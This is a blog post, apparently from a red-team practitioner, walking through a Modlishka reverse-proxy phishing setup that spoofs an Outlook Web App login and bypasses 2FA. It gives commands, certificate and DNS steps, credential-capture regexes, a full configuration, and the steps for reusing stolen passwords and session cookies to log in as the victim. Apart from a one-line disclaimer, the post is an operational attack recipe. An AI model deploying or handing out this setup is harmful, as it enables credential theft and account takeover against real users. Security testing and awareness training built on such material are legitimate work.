Phishing 101 with Modlishka

Very recently I got a chance to get my hands dirty on Modlishka, thanks to some awesome people at my workplace 🤘

For those who aren’t aware Modlishka is a powerful and flexible HTTP reverse proxy that has a universal 2FA “bypass” support.

It allows to transparently proxy multi-domain destination traffic, both TLS & non-TLS, over a single domain, without a requirement of installing any additional certificate on the client. Enough of technical jargons …

Requirements

— — — — — — — —

I needed to setup a fake Outlook Web App login page…

With time I realized that the Modlishka default templates are little bit outdated and it took me some time and effort to get it up & working again so I decided to blog about it :)

Setup

— — — —

1. We will create a new Digital Ocean droplet.

droplet created

2. After we ssh in, we will install certbot and download the Modlishka standalone binary as well as the default config file

Release Modlishka evolved · drk1wi/Modlishka

apt-get update && apt-get install certbot
wget https://github.com/drk1wi/Modlishka/releases/download/v.1.1.0/Modlishka-linux-amd64
chmod +x Modlishka-linux-amd64
wget https://github.com/drk1wi/Modlishka/releases/download/v.1.1.0/Modlishka-linux-amd64
wget https://raw.githubusercontent.com/drk1wi/Modlishka/master/templates/office365.json

Generating wild-card SSL certificates

— — — — — — — — — — — — — — — — — — — — — —

Suppose that we own the domain redacted.com and we wish generate a wild card SSL certificate that allow us to secure multiple sub domain names (hosts) pertaining to the same base domain. For that we will use https://letsencrypt.org/

certbot certonly --manual --preferred-challenges=dns --server https://acme-v02.api.letsencrypt.org/directory --agree-tos -d *.redacted.com --email basu@gmail.com

This will generate a challenge code as shown below:

challenge code

Adding DNS records

— — — — — — — — — — — —

In total we need to create three DNS records:

• A record for the root host @ that will point to the droplet IP
• CNAME record for any subdomain * pointing to @
• TXT record for redacted.com according to the challenge code shown above

DNS Records

Fixing certificate formats

— — — — — — — — — — — — — — —

Once the TXT record is set and verified, the certificate and the private key will be generated. However Modlishka wants them in a different format so let’s convert it accordingly:

cp -r /etc/letsencrypt/live/redacted.com/* /root/
awk '{printf "%s\\n", $0}' fullchain.pem
awk '{printf "%s\\n", $0}' privkey.pem

fullchain.pem

Open office365.json and copy the result of the awk’d command from fullchain.pem into cert parameter and privkey.pem into certKey parameter.

Fixing the configuration

— — — — — — — — — — — — — —

The Modlishka Office365 template in Github doesn’t parse the username and password by itself and needs some tweaking 🤔

We see that owa based authentication does a POST request at the owa/auth.owa endpoint.

login request

In order to grab the credentials so we need to adjust Modlishka’s credParams configuration using regex that can be verified from https://regex101.com/

username=([^\W]+[\.,\-,\_]{0,}\w+[\@,\%40]\w+[\.,\-,\_]{0,}\w+\.\w{2,5})
password=([a-zA-Z0-9"!"#$%&'()*+,-./:;<=>?@^_{|}~]+)&passwordText

username base64 encoded

password base64 encoded

Now we will add these base64 encoded values inside credParams separated by a comma.

“credParams”: “dXNlcm5hbWU9KFteXFddK1tcLixcLSxcX117MCx9XHcrW1xALFwlNDBdXHcrW1wuLFwtLFxfXXswLH1cdytcLlx3ezIsNX0p,cGFzc3dvcmQ9KFthLXpBLVowLTkiISIjJCUmJygpKissLS5cLzo7PD0+P0BeX3t8fX5dKykmcGFzc3dvcmRUZXh0”

Full configuration without the certificate and key:

{
  //domain owned and controlled by you
  "proxyDomain": "redacted.com",
  "listeningAddress": "0.0.0.0",
  "proxyAddress": "",
  //actual target domain which you want to spoof
  "target": "target.com",
  "targetResources": "",
  "rules": "by5zZXRBdHRyaWJ1dGUoImludGVncml0eSI=:by5zZXRBdHRyaWJ1dGUoImludGVnZHJpdHki,aW50ZWdyaXR5PQ==:aW50ZWdyaWN0eT0=,PC9oZWFkPg==:",
  
  //endpoints maybe mentioned that will trigger a terminate on successful login
  "terminateTriggers": "",
  //after termination victim can redirected to any arbitrary URL
  "terminateRedirectUrl": "",
  "trackingCookie": "id",
  "trackingParam": "id",
  "jsRules":"",
  "jsReflectParam": "reflect",
  "debug": false,
  "forceHTTPS": false,
  "forceHTTP": false,
  "dynamicMode": false,
  "logPostOnly": false,
  "disableSecurity": false,
  "log": "ms.log", 
  "plugins": "all",
  "credParams": "dXNlcm5hbWU9KFteXFddK1tcLixcLSxcX117MCx9XHcrW1xALFwlNDBdXHcrW1wuLFwtLFxfXXswLH1cdytcLlx3ezIsNX0p,cGFzc3dvcmQ9KFthLXpBLVowLTkiISIjJCUmJygpKissLS5cLzo7PD0+P0BeX3t8fX5dKykmcGFzc3dvcmRUZXh0",
  "cert": "", //awk'd version of fullchain.pem
  "certKey": "", //awk'd version of privkey.pem
  "certPool": ""
}

Pwnage

— — — — —

Let’s get the modlishka up and running…

modlishka

Finally after the victim has logged in using our Modlishka proxy page we can find the stolen credentials not only via logs but also via the /SayHello2Modlishka endpoint.

stolen credentials

Now we can use their credentials directly to log into our target domain or use their cookies and feed them to a cookie editor and refresh the page to get logged in automatically.

Disclaimer

— — — — — — —

This demo is only for demonstration and education purposes. Do not use these instructions to anything illegal.

thank you!